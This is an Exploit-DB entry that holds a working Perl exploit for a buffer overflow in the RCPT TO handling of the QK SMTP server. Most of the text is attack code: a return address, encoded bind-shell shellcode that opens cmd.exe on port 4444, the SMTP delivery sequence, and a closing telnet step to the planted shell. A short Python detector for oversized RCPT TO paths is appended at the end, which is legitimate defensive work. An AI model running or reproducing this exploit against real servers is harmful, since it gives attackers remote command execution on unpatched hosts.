Author: Jacopo Cervini
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Patch Exists: NO
Platforms Tested: Windows XP Pro SP0 English, Windows XP Pro SP2 Italian, Windows 2000 SP4 Italian/English

qksmtp-rcpt-overflow-4444

Binds a remote cmd.exe to port 4444 on the target host. This exploit is based on the original exploit discovered by Greg Linares. The shellcode used here is encoded with Skylined's alpha2 tool; credits to hdm and vlads902 for the original shellcode.


Exploit-DB raw data:

#!/bin/perl
#
# https://www.securityfocus.com/bid/20681
#
# tested on WinXP Pro SP0 English / WinXP Pro SP2 Italian / Win2k SP4 Italian/English; the return address is universal
# binds a remote cmd.exe on the target host on port 4444; based on expanders original exploit
# credit to Greg Linares for discovering the vulnerability
# thanks to hdm and vlads902 for the original shellcode; encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
print "--------------------------------------------------------------------\n";
exit 1;	# stop here instead of continuing with an undefined target host
}



use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="\x43\x43\x43\x43";	

my $eip="\x8f\x29\x46\x00";	#call esp in QKSmtpServer3.exe



# bind shell on TCP port 4444, alpha2 (alphanumeric) encoded; see the header comments
$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "\x50\x73".
"\x54\x73".
"\x58\x73".
"\xb0".
"\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x50\x73".
"\xc3\x73";

# 296 bytes of padding reach the saved return address, which is overwritten with $eip
# (call esp); then 0x73 filler, the encoded shellcode, 0x45 filler, the jmpback stub and a terminating null
my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "\r\n";
send $socket, $request, 0;
print "[+] Sent mail from request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "\r\n";
send $socket, $request, 0;
print "[+] Sent rcpt to request\n";



print " + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;

# milw0rm.com [2007-01-01]
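A defender-side check for the condition the script above abuses, an RCPT TO argument far longer than any legitimate recipient path. This is an added example, not part of the Exploit-DB entry; it assumes the RFC 5321 path limit of 256 octets and scans constructed sample lines, with placeholder bytes standing in for the real return address and shellcode.

```python
import re

# RFC 5321 section 4.5.3.1.3: a path (forward-path or reverse-path), angle
# brackets included, is at most 256 octets; the overflow above sends thousands.
MAX_PATH_OCTETS = 256
# Consecutive identical bytes at or above this count are treated as padding.
SLED_RUN_THRESHOLD = 64
RCPT_RE = re.compile(rb"^RCPT\s+TO:\s*(.*)$", re.IGNORECASE)

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def check_rcpt_line(line: bytes) -> list:
    """Findings for one SMTP command line; [] for benign or non-RCPT lines."""
    m = RCPT_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return []
    path = m.group(1)
    findings = []
    if len(path) > MAX_PATH_OCTETS:
        findings.append(f"path is {len(path)} octets, RFC 5321 allows {MAX_PATH_OCTETS}")
    if any(b < 0x20 or b > 0x7E for b in path):
        findings.append("path contains control or non-ASCII bytes")
    run = longest_run(path)
    if run >= SLED_RUN_THRESHOLD:
        findings.append(f"run of {run} identical bytes (padding or sled)")
    return findings

def scan_session(lines) -> dict:
    """Map line index -> findings for every flagged RCPT TO line in a session."""
    return {i: f for i, line in enumerate(lines) if (f := check_rcpt_line(line))}

# Constructed sample session: a benign recipient, then a line shaped like the
# exploit buffer above (same segment lengths, placeholder bytes in place of the
# real return address and shellcode).
SAMPLE_SESSION = [
    b"HELO client.example\r\n",
    b"MAIL FROM:<alice@example.com>\r\n",
    b"RCPT TO:<bob@example.com>\r\n",
    b"rcpt to: " + b"A" * 296 + b"\xde\xad\xbe\xef" + b"\x73" * 2228
    + b"S" * 400 + b"E" * 820 + b"\x00\r\n",
]
```

The same three checks apply to MAIL FROM if the regex is widened, since RFC 5321 gives the reverse-path the same 256-octet limit.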